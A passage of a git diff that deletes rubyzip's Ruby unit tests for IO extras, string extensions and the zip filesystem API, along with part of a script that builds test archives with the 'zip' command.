-      # without bash system interprets everything after echo as parameters to
-      # echo including | zip -z ...
-      raise "failed to add comment to test zip '#{TEST_ZIP2.zip_name}'" unless 
-  system("bash -c \"echo #{TEST_ZIP2.comment} | zip -z #{TEST_ZIP2.zip_name}\"")
-
-      raise "failed to create test zip '#{TEST_ZIP3.zip_name}'" unless 
-  system("zip #{TEST_ZIP3.zip_name} #{TEST_ZIP3.entry_names.join(' ')}")
-
-      raise "failed to create test zip '#{TEST_ZIP4.zip_name}'" unless 
-  system("zip #{TEST_ZIP4.zip_name} #{TEST_ZIP4.entry_names.join(' ')}")
-    end
-  rescue 
-    raise $!.to_s + 
-      "\n\nziptest.rb requires the Info-ZIP program 'zip' in the path\n" +
-      "to create test data. If you don't have it you can download\n"   +
-      "the necessary test files at http://sf.net/projects/rubyzip."
-  end
-
-  TEST_ZIP1 = TestZipFile.new("data/generated/empty.zip", [])
-  TEST_ZIP2 = TestZipFile.new("data/generated/5entry.zip", %w{ data/generated/longAscii.txt data/generated/empty.txt data/generated/empty_chmod640.txt data/generated/short.txt data/generated/longBinary.bin}, 
-            "my zip comment")
-  TEST_ZIP3 = TestZipFile.new("data/generated/test1.zip", %w{ data/file1.txt })
-  TEST_ZIP4 = TestZipFile.new("data/generated/zipWithDir.zip", [ "data/file1.txt", 
-        TestFiles::EMPTY_TEST_DIR])
-end
-
-
-END {
-  TestFiles::create_test_files(ARGV.index("recreate") != nil || 
-           ARGV.index("recreateonly") != nil)
-  TestZipFile::create_test_zips(ARGV.index("recreate") != nil || 
-            ARGV.index("recreateonly") != nil)
-  exit if ARGV.index("recreateonly") != nil
-}
diff --git a/lib/zip/test/ioextrastest.rb b/lib/zip/test/ioextrastest.rb
deleted file mode 100755
index b18e9db987..0000000000
--- a/lib/zip/test/ioextrastest.rb
+++ /dev/null
@@ -1,208 +0,0 @@
-#!/usr/bin/env ruby
-
-$VERBOSE = true
-
-$: << "../lib"
-
-require 'test/unit'
-require 'zip/ioextras'
-
-include IOExtras
-
-class FakeIOTest < Test::Unit::TestCase
-  class FakeIOUsingClass
-    include FakeIO
-  end
-
-  def test_kind_of?
-    obj = FakeIOUsingClass.new
-    
-    assert(obj.kind_of?(Object))
-    assert(obj.kind_of?(FakeIOUsingClass))
-    assert(obj.kind_of?(IO))
-    assert(!obj.kind_of?(Fixnum))
-    assert(!obj.kind_of?(String))
-  end
-end
-
-class AbstractInputStreamTest < Test::Unit::TestCase
-  # AbstractInputStream subclass that provides a read method
-  
-  TEST_LINES = [ "Hello world#{$/}", 
-    "this is the second line#{$/}", 
-    "this is the last line"]
-  TEST_STRING = TEST_LINES.join
-  class TestAbstractInputStream 
-    include AbstractInputStream
-    def initialize(aString)
-      super()
-      @contents = aString
-      @readPointer = 0
-    end
-
-    def read(charsToRead)
-      retVal=@contents[@readPointer, charsToRead]
-      @readPointer+=charsToRead
-      return retVal
-    end
-
-    def produce_input
-      read(100)
-    end
-
-    def input_finished?
-      @contents[@readPointer] == nil
-    end
-  end
-
-  def setup
-    @io = TestAbstractInputStream.new(TEST_STRING)
-  end
-  
-  def test_gets
-    assert_equal(TEST_LINES[0], @io.gets)
-    assert_equal(1, @io.lineno)
-    assert_equal(TEST_LINES[1], @io.gets)
-    assert_equal(2, @io.lineno)
-    assert_equal(TEST_LINES[2], @io.gets)
-    assert_equal(3, @io.lineno)
-    assert_equal(nil, @io.gets)
-    assert_equal(4, @io.lineno)
-  end
-
-  def test_getsMultiCharSeperator
-    assert_equal("Hell", @io.gets("ll"))
-    assert_equal("o world#{$/}this is the second l", @io.gets("d l"))
-  end
-
-  def test_each_line
-    lineNumber=0
-    @io.each_line {
-      |line|
-      assert_equal(TEST_LINES[lineNumber], line)
-      lineNumber+=1
-    }
-  end
-
-  def test_readlines
-    assert_equal(TEST_LINES, @io.readlines)
-  end
-
-  def test_readline
-    test_gets
-    begin
-      @io.readline
-      fail "EOFError expected"
-      rescue EOFError
-    end
-  end
-end
-
-class AbstractOutputStreamTest < Test::Unit::TestCase
-  class TestOutputStream
-    include AbstractOutputStream
-
-    attr_accessor :buffer
-
-    def initialize
-      @buffer = ""
-    end
-
-    def << (data)
-      @buffer << data
-      self
-    end
-  end
-
-  def setup
-    @outputStream = TestOutputStream.new
-
-    @origCommaSep = $,
-    @origOutputSep = $\
-  end
-
-  def teardown
-    $, = @origCommaSep
-    $\ = @origOutputSep
-  end
-
-  def test_write
-    count = @outputStream.write("a little string")
-    assert_equal("a little string", @outputStream.buffer)
-    assert_equal("a little string".length, count)
-
-    count = @outputStream.write(". a little more")
-    assert_equal("a little string. a little more", @outputStream.buffer)
-    assert_equal(". a little more".length, count)
-  end
-  
-  def test_print
-    $\ = nil # record separator set to nil
-    @outputStream.print("hello")
-    assert_equal("hello", @outputStream.buffer)
-
-    @outputStream.print(" world.")
-    assert_equal("hello world.", @outputStream.buffer)
-    
-    @outputStream.print(" You ok ",  "out ", "there?")
-    assert_equal("hello world. You ok out there?", @outputStream.buffer)
-
-    $\ = "\n"
-    @outputStream.print
-    assert_equal("hello world. You ok out there?\n", @outputStream.buffer)
-
-    @outputStream.print("I sure hope so!")
-    assert_equal("hello world. You ok out there?\nI sure hope so!\n", @outputStream.buffer)
-
-    $, = "X"
-    @outputStream.buffer = ""
-    @outputStream.print("monkey", "duck", "zebra")
-    assert_equal("monkeyXduckXzebra\n", @outputStream.buffer)
-
-    $\ = nil
-    @outputStream.buffer = ""
-    @outputStream.print(20)
-    assert_equal("20", @outputStream.buffer)
-  end
-  
-  def test_printf
-    @outputStream.printf("%d %04x", 123, 123) 
-    assert_equal("123 007b", @outputStream.buffer)
-  end
-  
-  def test_putc
-    @outputStream.putc("A")
-    assert_equal("A", @outputStream.buffer)
-    @outputStream.putc(65)
-    assert_equal("AA", @outputStream.buffer)
-  end
-
-  def test_puts
-    @outputStream.puts
-    assert_equal("\n", @outputStream.buffer)
-
-    @outputStream.puts("hello", "world")
-    assert_equal("\nhello\nworld\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts("hello\n", "world\n")
-    assert_equal("hello\nworld\n", @outputStream.buffer)
-    
-    @outputStream.buffer = ""
-    @outputStream.puts(["hello\n", "world\n"])
-    assert_equal("hello\nworld\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts(["hello\n", "world\n"], "bingo")
-    assert_equal("hello\nworld\nbingo\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts(16, 20, 50, "hello")
-    assert_equal("16\n20\n50\nhello\n", @outputStream.buffer)
-  end
-end
-
-
-# Copyright (C) 2002-2004 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
diff --git a/lib/zip/test/stdrubyexttest.rb b/lib/zip/test/stdrubyexttest.rb
deleted file mode 100755
index f11608f7f3..0000000000
--- a/lib/zip/test/stdrubyexttest.rb
+++ /dev/null
@@ -1,52 +0,0 @@
-#!/usr/bin/env ruby
-
-$VERBOSE = true
-
-$: << "../lib"
-
-require 'test/unit'
-require 'zip/stdrubyext'
-
-class ModuleTest < Test::Unit::TestCase
-
-  def test_select_map
-    assert_equal([2, 4, 8, 10], [1, 2, 3, 4, 5].select_map { |e| e == 3 ? nil : 2*e })
-  end
-  
-end
-
-class StringExtensionsTest < Test::Unit::TestCase
-
-  def test_starts_with
-    assert("hello".starts_with(""))
-    assert("hello".starts_with("h"))
-    assert("hello".starts_with("he"))
-    assert(! "hello".starts_with("hello there"))
-    assert(! "hello".starts_with(" he"))
-
-    assert_raise(TypeError, "type mismatch: NilClass given") { 
-      "hello".starts_with(nil) 
-    }
-  end
-
-  def test_ends_with
-    assert("hello".ends_with("o"))
-    assert("hello".ends_with("lo"))
-    assert("hello".ends_with("hello"))
-    assert(!"howdy".ends_with("o"))
-    assert(!"howdy".ends_with("oy"))
-    assert(!"howdy".ends_with("howdy doody"))
-    assert(!"howdy".ends_with("doody howdy"))
-  end
-
-  def test_ensure_end
-    assert_equal("hello!", "hello!".ensure_end("!"))
-    assert_equal("hello!", "hello!".ensure_end("o!"))
-    assert_equal("hello!", "hello".ensure_end("!"))
-    assert_equal("hello!", "hel".ensure_end("lo!"))
-  end
-end
-
-# Copyright (C) 2002, 2003 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
diff --git a/lib/zip/test/zipfilesystemtest.rb b/lib/zip/test/zipfilesystemtest.rb
deleted file mode 100755
index f74e804696..0000000000
--- a/lib/zip/test/zipfilesystemtest.rb
+++ /dev/null
@@ -1,845 +0,0 @@
-#!/usr/bin/env ruby
-
-$VERBOSE = true
-
-$: << "../lib"
-
-require 'zip/zipfilesystem'
-require 'test/unit'
-require 'fileutils'
-
-module ExtraAssertions
-
-  def assert_forwarded(anObject, method, retVal, *expectedArgs)
-    callArgs = nil
-    setCallArgsProc = proc { |args| callArgs = args }
-    anObject.instance_eval <<-"end_eval"
-      alias #{method}_org #{method}
-      def #{method}(*args)
-        ObjectSpace._id2ref(#{setCallArgsProc.object_id}).call(args)
-        ObjectSpace._id2ref(#{retVal.object_id})
-        end
-    end_eval
-
-    assert_equal(retVal, yield) # Invoke test
-    assert_equal(expectedArgs, callArgs)
-  ensure
-    anObject.instance_eval "undef #{method}; alias #{method} #{method}_org"
-  end
-
-end
-
-include Zip
-
-class ZipFsFileNonmutatingTest < Test::Unit::TestCase
-  def setup
-    @zipFile = ZipFile.new("data/zipWithDirs.zip")
-  end
-
-  def teardown
-    @zipFile.close if @zipFile
-  end
-
-  def test_umask
-    assert_equal(File.umask, @zipFile.file.umask)
-    @zipFile.file.umask(0006)
-  end
-
-  def test_exists?
-    assert(! @zipFile.file.exists?("notAFile"))
-    assert(@zipFile.file.exists?("file1"))
-    assert(@zipFile.file.exists?("dir1"))
-    assert(@zipFile.file.exists?("dir1/"))
-    assert(@zipFile.file.exists?("dir1/file12"))
-    assert(@zipFile.file.exist?("dir1/file12")) # notice, tests exist? alias of exists? !
-
-    @zipFile.dir.chdir "dir1/"
-    assert(!@zipFile.file.exists?("file1"))
-    assert(@zipFile.file.exists?("file12"))
-  end
-
-  def test_open_read
-    blockCalled = false
-    @zipFile.file.open("file1", "r") {
-      |f|
-      blockCalled = true
-      assert_equal("this is the entry 'file1' in my test archive!", 
-        f.readline.chomp)
-    }
-    assert(blockCalled)
-
-    blockCalled = false
-    @zipFile.file.open("file1", "rb") { # test binary flag is ignored
-      |f|
-      blockCalled = true
-      assert_equal("this is the entry 'file1' in my test archive!", 
-        f.readline.chomp)
-    }
-    assert(blockCalled)
-
-    blockCalled = false
-    @zipFile.dir.chdir "dir2"
-    @zipFile.file.open("file21", "r") {
-      |f|
-      blockCalled = true
-      assert_equal("this is the entry 'dir2/file21' in my test archive!", 
-        f.readline.chomp)
-    }
-    assert(blockCalled)
-    @zipFile.dir.chdir "/"
-    
-    assert_raise(Errno::ENOENT) {
-      @zipFile.file.open("noSuchEntry")
-    }
-
-    begin
-      is = @zipFile.file.open("file1")
-      assert_equal("this is the entry 'file1' in my test archive!", 
-        is.readline.chomp)
-    ensure
-      is.close if is
-    end
-  end
-
-  def test_new
-    begin
-      is = @zipFile.file.new("file1")
-      assert_equal("this is the entry 'file1' in my test archive!", 
-        is.readline.chomp)
-    ensure
-      is.close if is
-    end
-    begin
-      is = @zipFile.file.new("file1") {
-  fail "should not call block"
-      }
-    ensure
-      is.close if is
-    end
-  end
-
-  def test_symlink
-    assert_raise(NotImplementedError) {
-      @zipFile.file.symlink("file1", "aSymlink")
-    }
-  end
-  
-  def test_size
-    assert_raise(Errno::ENOENT) { @zipFile.file.size("notAFile") }
-    assert_equal(72, @zipFile.file.size("file1"))
-    assert_equal(0, @zipFile.file.size("dir2/dir21"))
-
-    assert_equal(72, @zipFile.file.stat("file1").size)
-    assert_equal(0, @zipFile.file.stat("dir2/dir21").size)
-  end
-
-  def test_size?
-    assert_equal(nil, @zipFile.file.size?("notAFile"))
-    assert_equal(72, @zipFile.file.size?("file1"))
-    assert_equal(nil, @zipFile.file.size?("dir2/dir21"))
-
-    assert_equal(72, @zipFile.file.stat("file1").size?)
-    assert_equal(nil, @zipFile.file.stat("dir2/dir21").size?)
-  end
-
-
-  def test_file?
-    assert(@zipFile.file.file?("file1"))
-    assert(@zipFile.file.file?("dir2/file21"))
-    assert(! @zipFile.file.file?("dir1"))
-    assert(! @zipFile.file.file?("dir1/dir11"))
-
-    assert(@zipFile.file.stat("file1").file?)
-    assert(@zipFile.file.stat("dir2/file21").file?)
-    assert(! @zipFile.file.stat("dir1").file?)
-    assert(! @zipFile.file.stat("dir1/dir11").file?)
-  end
-
-  include ExtraAssertions
-
-  def test_dirname
-    assert_forwarded(File, :dirname, "retVal", "a/b/c/d") { 
-      @zipFile.file.dirname("a/b/c/d")
-    }
-  end
-
-  def test_basename
-    assert_forwarded(File, :basename, "retVal", "a/b/c/d") { 
-      @zipFile.file.basename("a/b/c/d")
-    }
-  end
-
-  def test_split
-    assert_forwarded(File, :split, "retVal", "a/b/c/d") { 
-      @zipFile.file.split("a/b/c/d")
-    }
-  end
-
-  def test_join
-    assert_equal("a/b/c", @zipFile.file.join("a/b", "c"))
-    assert_equal("a/b/c/d", @zipFile.file.join("a/b", "c/d"))
-    assert_equal("/c/d", @zipFile.file.join("", "c/d"))
-    assert_equal("a/b/c/d", @zipFile.file.join("a", "b", "c", "d"))
-  end
-
-  def test_utime
-    t_now = Time.now
-    t_bak = @zipFile.file.mtime("file1")
-    @zipFile.file.utime(t_now, "file1")
-    assert_equal(t_now, @zipFile.file.mtime("file1"))
-    @zipFile.file.utime(t_bak, "file1")
-    assert_equal(t_bak, @zipFile.file.mtime("file1"))
-  end
-
-
-  def assert_always_false(operation)
-    assert(! @zipFile.file.send(operation, "noSuchFile"))
-    assert(! @zipFile.file.send(operation, "file1"))
-    assert(! @zipFile.file.send(operation, "dir1"))
-    assert(! @zipFile.file.stat("file1").send(operation))
-    assert(! @zipFile.file.stat("dir1").send(operation))
-  end
-
-  def assert_true_if_entry_exists(operation)
-    assert(! @zipFile.file.send(operation, "noSuchFile"))
-    assert(@zipFile.file.send(operation, "file1"))
-    assert(@zipFile.file.send(operation, "dir1"))
-    assert(@zipFile.file.stat("file1").send(operation))
-    assert(@zipFile.file.stat("dir1").send(operation))
-  end
-
-  def test_pipe?
-    assert_always_false(:pipe?)
-  end
-
-  def test_blockdev?
-    assert_always_false(:blockdev?)
-  end
-
-  def test_symlink?
-    assert_always_false(:symlink?)
-  end
-
-  def test_socket?
-    assert_always_false(:socket?)
-  end
-
-  def test_chardev?
-    assert_always_false(:chardev?)
-  end
-
-  def test_truncate
-    assert_raise(StandardError, "truncate not supported") {
-      @zipFile.file.truncate("file1", 100)
-    }
-  end
-
-  def assert_e_n_o_e_n_t(operation, args = ["NoSuchFile"])
-    assert_raise(Errno::ENOENT) {
-      @zipFile.file.send(operation, *args)
-    }
-  end
-
-  def test_ftype
-    assert_e_n_o_e_n_t(:ftype)
-    assert_equal("file", @zipFile.file.ftype("file1"))
-    assert_equal("directory", @zipFile.file.ftype("dir1/dir11"))
-    assert_equal("directory", @zipFile.file.ftype("dir1/dir11/"))
-  end
-
-  def test_link
-    assert_raise(NotImplementedError) {
-      @zipFile.file.link("file1", "someOtherString")
-    }
-  end
-
-  def test_directory?
-    assert(! @zipFile.file.directory?("notAFile"))
-    assert(! @zipFile.file.directory?("file1"))
-    assert(! @zipFile.file.directory?("dir1/file11"))
-    assert(@zipFile.file.directory?("dir1"))
-    assert(@zipFile.file.directory?("dir1/"))
-    assert(@zipFile.file.directory?("dir2/dir21"))
-
-    assert(! @zipFile.file.stat("file1").directory?)
-    assert(! @zipFile.file.stat("dir1/file11").directory?)
-    assert(@zipFile.file.stat("dir1").directory?)
-    assert(@zipFile.file.stat("dir1/").directory?)
-    assert(@zipFile.file.stat("dir2/dir21").directory?)
-  end
-
-  def test_chown
-    assert_equal(2, @zipFile.file.chown(1,2, "dir1", "file1"))
-    assert_equal(1, @zipFile.file.stat("dir1").uid)
-    assert_equal(2, @zipFile.file.stat("dir1").gid)
-    assert_equal(2, @zipFile.file.chown(nil, nil, "dir1", "file1"))
-  end
-
-  def test_zero?
-    assert(! @zipFile.file.zero?("notAFile"))
-    assert(! @zipFile.file.zero?("file1"))
-    assert(@zipFile.file.zero?("dir1"))
-    blockCalled = false
-    ZipFile.open("data/generated/5entry.zip") {
-      |zf|
-      blockCalled = true
-      assert(zf.file.zero?("data/generated/empty.txt"))
-    }
-    assert(blockCalled)
-
-    assert(! @zipFile.file.stat("file1").zero?)
-    assert(@zipFile.file.stat("dir1").zero?)
-    blockCalled = false
-    ZipFile.open("data/generated/5entry.zip") {
-      |zf|
-      blockCalled = true
-      assert(zf.file.stat("data/generated/empty.txt").zero?)
-    }
-    assert(blockCalled)
-  end
-
-  def test_expand_path
-    ZipFile.open("data/zipWithDirs.zip") {
-      |zf|
-      assert_equal("/", zf.file.expand_path("."))
-      zf.dir.chdir "dir1"
-      assert_equal("/dir1", zf.file.expand_path("."))
-      assert_equal("/dir1/file12", zf.file.expand_path("file12"))
-      assert_equal("/", zf.file.expand_path(".."))
-      assert_equal("/dir2/dir21", zf.file.expand_path("../dir2/dir21"))
-    }
-  end
-
-  def test_mtime
-    assert_equal(Time.at(1027694306),
-      @zipFile.file.mtime("dir2/file21"))
-    assert_equal(Time.at(1027690863),
-      @zipFile.file.mtime("dir2/dir21"))
-    assert_raise(Errno::ENOENT) {
-      @zipFile.file.mtime("noSuchEntry")
-    }
-
-    assert_equal(Time.at(1027694306),
-      @zipFile.file.stat("dir2/file21").mtime)
-    assert_equal(Time.at(1027690863),
-      @zipFile.file.stat("dir2/dir21").mtime)
-  end
-
-  def test_ctime
-    assert_nil(@zipFile.file.ctime("file1"))
-    assert_nil(@zipFile.file.stat("file1").ctime)
-  end
-
-  def test_atime
-    assert_nil(@zipFile.file.atime("file1"))
-    assert_nil(@zipFile.file.stat("file1").atime)
-  end
-
-  def test_readable?
-    assert(! @zipFile.file.readable?("noSuchFile"))
-    assert(@zipFile.file.readable?("file1"))
-    assert(@zipFile.file.readable?("dir1"))
-    assert(@zipFile.file.stat("file1").readable?)
-    assert(@zipFile.file.stat("dir1").readable?)
-  end
-
-  def test_readable_real?
-    assert(! @zipFile.file.readable_real?("noSuchFile"))
-    assert(@zipFile.file.readable_real?("file1"))
-    assert(@zipFile.file.readable_real?("dir1"))
-    assert(@zipFile.file.stat("file1").readable_real?)
-    assert(@zipFile.file.stat("dir1").readable_real?)
-  end
-
-  def test_writable?
-    assert(! @zipFile.file.writable?("noSuchFile"))
-    assert(@zipFile.file.writable?("file1"))
-    assert(@zipFile.file.writable?("dir1"))
-    assert(@zipFile.file.stat("file1").writable?)
-    assert(@zipFile.file.stat("dir1").writable?)
-  end
-
-  def test_writable_real?
-    assert(! @zipFile.file.writable_real?("noSuchFile"))
-    assert(@zipFile.file.writable_real?("file1"))
-    assert(@zipFile.file.writable_real?("dir1"))
-    assert(@zipFile.file.stat("file1").writable_real?)
-    assert(@zipFile.file.stat("dir1").writable_real?)
-  end
-
-  def test_executable?
-    assert(! @zipFile.file.executable?("noSuchFile"))
-    assert(! @zipFile.file.executable?("file1"))
-    assert(@zipFile.file.executable?("dir1"))
-    assert(! @zipFile.file.stat("file1").executable?)
-    assert(@zipFile.file.stat("dir1").executable?)
-  end
-
-  def test_executable_real?
-    assert(! @zipFile.file.executable_real?("noSuchFile"))
-    assert(! @zipFile.file.executable_real?("file1"))
-    assert(@zipFile.file.executable_real?("dir1"))
-    assert(! @zipFile.file.stat("file1").executable_real?)
-    assert(@zipFile.file.stat("dir1").executable_real?)
-  end
-
-  def test_owned?
-    assert_true_if_entry_exists(:owned?)
-  end
-
-  def test_grpowned?
-    assert_true_if_entry_exists(:grpowned?)
-  end
-
-  def test_setgid?
-    assert_always_false(:setgid?)
-  end
-
-  def test_setuid?
-    assert_always_false(:setgid?)
-  end
-
-  def test_sticky?
-    assert_always_false(:sticky?)
-  end
-
-  def test_readlink
-    assert_raise(NotImplementedError) {
-      @zipFile.file.readlink("someString")
-    }
-  end
-
-  def test_stat
-    s = @zipFile.file.stat("file1")
-    assert(s.kind_of?(File::Stat)) # It pretends
-    assert_raise(Errno::ENOENT, "No such file or directory - noSuchFile") {
-      @zipFile.file.stat("noSuchFile")
-    }
-  end
-
-  def test_lstat
-    assert(@zipFile.file.lstat("file1").file?)
-  end
-
-
-  def test_chmod
-    assert_raise(Errno::ENOENT, "No such file or directory - noSuchFile") {
-      @zipFile.file.chmod(0644, "file1", "NoSuchFile")
-    }
-    assert_equal(2, @zipFile.file.chmod(0644, "file1", "dir1"))
-  end
-
-  def test_pipe
-    assert_raise(NotImplementedError) {
-      @zipFile.file.pipe
-    }
-  end
-
-  def test_foreach
-    ZipFile.open("data/generated/zipWithDir.zip") {
-      |zf|
-      ref = []
-      File.foreach("data/file1.txt") { |e| ref << e }
-      
-      index = 0
-      zf.file.foreach("data/file1.txt") { 
-  |l|
-  assert_equal(ref[index], l)
-  index = index.next
-      }
-      assert_equal(ref.size, index)
-    }
-    
-    ZipFile.open("data/generated/zipWithDir.zip") {
-      |zf|
-      ref = []
-      File.foreach("data/file1.txt", " ") { |e| ref << e }
-      
-      index = 0
-      zf.file.foreach("data/file1.txt", " ") { 
-  |l|
-  assert_equal(ref[index], l)
-  index = index.next
-      }
-      assert_equal(ref.size, index)
-    }
-  end
-
-  def test_popen
-    if RUBY_PLATFORM =~ /mswin|mingw/i
-      cmd = 'dir'
-    else
-      cmd = 'ls'
-    end
-
-    assert_equal(File.popen(cmd)          { |f| f.read }, 
-      @zipFile.file.popen(cmd) { |f| f.read })
-  end
-
-# Can be added later
-#  def test_select
-#    fail "implement test"
-#  end
-
-  def test_readlines
-    ZipFile.open("data/generated/zipWithDir.zip") {
-      |zf|
-      assert_equal(File.readlines("data/file1.txt"), 
-        zf.file.readlines("data/file1.txt"))
-    }
-  end
-
-  def test_read
-    ZipFile.open("data/generated/zipWithDir.zip") {
-      |zf|
-      assert_equal(File.read("data/file1.txt"), 
-        zf.file.read("data/file1.txt"))
-    }
-  end
-
-end
-
-class ZipFsFileStatTest < Test::Unit::TestCase
-
-  def setup
-    @zipFile = ZipFile.new("data/zipWithDirs.zip")
-  end
-
-  def teardown
-    @zipFile.close if @zipFile
-  end
-
-  def test_blocks
-    assert_equal(nil, @zipFile.file.stat("file1").blocks)
-  end
-
-  def test_ino
-    assert_equal(0, @zipFile.file.stat("file1").ino)
-  end
-
-  def test_uid
-    assert_equal(0, @zipFile.file.stat("file1").uid)
-  end
-
-  def test_gid
-    assert_equal(0, @zipFile.file.stat("file1").gid)
-  end
-
-  def test_ftype
-    assert_equal("file", @zipFile.file.stat("file1").ftype)
-    assert_equal("directory", @zipFile.file.stat("dir1").ftype)
-  end
-
-  def test_mode
-    assert_equal(0600, @zipFile.file.stat("file1").mode & 0777)
-    assert_equal(0600, @zipFile.file.stat("file1").mode & 0777)
-    assert_equal(0755, @zipFile.file.stat("dir1").mode & 0777)
-    assert_equal(0755, @zipFile.file.stat("dir1").mode & 0777)
-  end
-
-  def test_dev
-    assert_equal(0, @zipFile.file.stat("file1").dev)
-  end
-
-  def test_rdev
-    assert_equal(0, @zipFile.file.stat("file1").rdev)
-  end
-
-  def test_rdev_major
-    assert_equal(0, @zipFile.file.stat("file1").rdev_major)
-  end
-
-  def test_rdev_minor
-    assert_equal(0, @zipFile.file.stat("file1").rdev_minor)
-  end
-
-  def test_nlink
-    assert_equal(1, @zipFile.file.stat("file1").nlink)
-  end
-
-  def test_blksize
-    assert_nil(@zipFile.file.stat("file1").blksize)
-  end
-
-end
-
-class ZipFsFileMutatingTest < Test::Unit::TestCase
-  TEST_ZIP = "zipWithDirs_copy.zip"
-  def setup
-    FileUtils.cp("data/zipWithDirs.zip", TEST_ZIP)
-  end
-
-  def teardown
-  end
- 
-  def test_delete
-    do_test_delete_or_unlink(:delete)
-  end
-
-  def test_unlink
-    do_test_delete_or_unlink(:unlink)
-  end
-  
-  def test_open_write
-    ZipFile.open(TEST_ZIP) {
-      |zf|
-
-      zf.file.open("test_open_write_entry", "w") {
-        |f|
-        blockCalled = true
-        f.write "This is what I'm writing"
-      }
-      assert_equal("This is what I'm writing",
-                    zf.file.read("test_open_write_entry"))
-
-      # Test with existing entry
-      zf.file.open("file1", "wb") { #also check that 'b' option is ignored
-        |f|
-        blockCalled = true
-        f.write "This is what I'm writing too"
-      }
-      assert_equal("This is what I'm writing too",
-                    zf.file.read("file1"))
-    }
-  end
-
-  def test_rename
-    ZipFile.open(TEST_ZIP) {
-      |zf|
-      assert_raise(Errno::ENOENT, "") { 
-        zf.file.rename("NoSuchFile", "bimse")
-      }
-      zf.file.rename("file1", "newNameForFile1")
-    }
-
-    ZipFile.open(TEST_ZIP) {
-      |zf|
-      assert(! zf.file.exists?("file1"))
-      assert(zf.file.exists?("newNameForFile1"))
-    }
-  end
-
-  def do_test_delete_or_unlink(symbol)
-    ZipFile.open(TEST_ZIP) {
-      |zf|
-      assert(zf.file.exists?("dir2/dir21/dir221/file2221"))
-      zf.file.send(symbol, "dir2/dir21/dir221/file2221")
-      assert(! zf.file.exists?("dir2/dir21/dir221/file2221"))
-
-      assert(zf.file.exists?("dir1/file11"))
-      assert(zf.file.exists?("dir1/file12"))
-      zf.file.send(symbol, "dir1/file11", "dir1/file12")
-      assert(! zf.file.exists?("dir1/file11"))
-      assert(! zf.file.exists?("dir1/file12"))
-
-      assert_raise(Errno::ENOENT) { zf.file.send(symbol, "noSuchFile") }
-      assert_raise(Errno::EISDIR) { zf.file.send(symbol, "dir1/dir11") }
-      assert_raise(Errno::EISDIR) { zf.file.send(symbol, "dir1/dir11/") }
-    }
-
-    ZipFile.open(TEST_ZIP) {
-      |zf|
-      assert(! zf.file.exists?("dir2/dir21/dir221/file2221"))
-      assert(! zf.file.exists?("dir1/file11"))
-      assert(! zf.file.exists?("dir1/file12"))
-
-      assert(zf.file.exists?("dir1/dir11"))
-      assert(zf.file.exists?("dir1/dir11/"))
-    }
-  end
-
-end
-
-class ZipFsDirectoryTest < Test::Unit::TestCase
-  TEST_ZIP = "zipWithDirs_copy.zip"
-
-  def setup
-    FileUtils.cp("data/zipWithDirs.zip", TEST_ZIP)
-  end
-
-  def test_delete
-    ZipFile.open(TEST_ZIP) {
-      |zf|
-      assert_raise(Errno::ENOENT, "No such file or directory - NoSuchFile.txt") {
-        zf.dir.delete("NoSuchFile.txt")
-      }
-      assert_raise(Errno::EINVAL, "Invalid argument - file1") {
-        zf.dir.delete("file1")
-      }
-      assert(zf.file.exists?("dir1"))
-      zf.dir.delete("dir1")
-      assert(! zf.file.exists?("dir1"))
-    }
-  end
-
-  def test_mkdir
-    ZipFile.open(TEST_ZIP) {
-      |zf|
-      assert_raise(Errno::EEXIST, "File exists - dir1") { 
-        zf.dir.mkdir("file1") 
-      }
-      assert_raise(Errno::EEXIST, "File exists - dir1") { 
-        zf.dir.mkdir("dir1") 
-      }
-      assert(!zf.file.exists?("newDir"))
-      zf.dir.mkdir("newDir")
-      assert(zf.file.directory?("newDir"))
-      assert(!zf.file.exists?("newDir2"))
-      zf.dir.mkdir("newDir2", 3485)
-      assert(zf.file.directory?("newDir2"))
-    }
-  end
-  
-  def test_pwd_chdir_entries
-    ZipFile.open(TEST_ZIP) {
-      |zf|
-      assert_equal("/", zf.dir.pwd)
-
-      assert_raise(Errno::ENOENT, "No such file or directory - no such dir") {
-        zf.dir.chdir "no such dir"
-      }
-      
-      assert_raise(Errno::EINVAL, "Invalid argument - file1") {
-        zf.dir.chdir "file1"
-      }
-
-      assert_equal(["dir1", "dir2", "file1"].sort, zf.dir.entries(".").sort)
-      zf.dir.chdir "dir1"
-      assert_equal("/dir1", zf.dir.pwd)
-      assert_equal(["dir11", "file11", "file12"], zf.dir.entries(".").sort)
-      
-      zf.dir.chdir "../dir2/dir21"
-      assert_equal("/dir2/dir21", zf.dir.pwd)
-      assert_equal(["dir221"].sort, zf.dir.entries(".").sort)
-    }
-  end
-
-  def test_foreach
-    ZipFile.open(TEST_ZIP) {
-      |zf|
-
-      blockCalled = false
-      assert_raise(Errno::ENOENT, "No such file or directory - noSuchDir") {
-        zf.dir.foreach("noSuchDir") { |e| blockCalled = true }
-      }
-      assert(! blockCalled)
-
-      assert_raise(Errno::ENOTDIR, "Not a directory - file1") {
-        zf.dir.foreach("file1") { |e| blockCalled = true }
-      }
-      assert(! blockCalled)
-
-      entries = []
-      zf.dir.foreach(".") { |e| entries << e }
-      assert_equal(["dir1", "dir2", "file1"].sort, entries.sort)
-
-      entries = []
-      zf.dir.foreach("dir1") { |e| entries << e }
-      assert_equal(["dir11", "file11", "file12"], entries.sort)
-    }
-  end
-
-  def test_chroot
-    ZipFile.open(TEST_ZIP) {
-      |zf|
-      assert_raise(NotImplementedError) {
-        zf.dir.chroot
-      }
-    }
-  end
-
-  # Globbing not supported yet
-  #def test_glob
-  #  # test alias []-operator too
-  #  fail "implement test"
-  #end
-
-  def test_open_new
-    ZipFile.open(TEST_ZIP) {
-      |zf|
-
-      assert_raise(Errno::ENOTDIR, "Not a directory - file1") {
-        zf.dir.new("file1")
-      }
-
-      assert_raise(Errno::ENOENT, "No such file or directory - noSuchFile") {
-        zf.dir.new("noSuchFile")
-      }
-
-      d = zf.dir.new(".")
-      assert_equal(["file1", "dir1", "dir2"].sort, d.entries.sort)
-      d.close
-
-      zf.dir.open("dir1") {
-        |dir|
-        assert_equal(["dir11", "file11", "file12"].sort, dir.entries.sort)
-      }
-    }
-  end
-
-end
-
-class ZipFsDirIteratorTest < Test::Unit::TestCase
-  
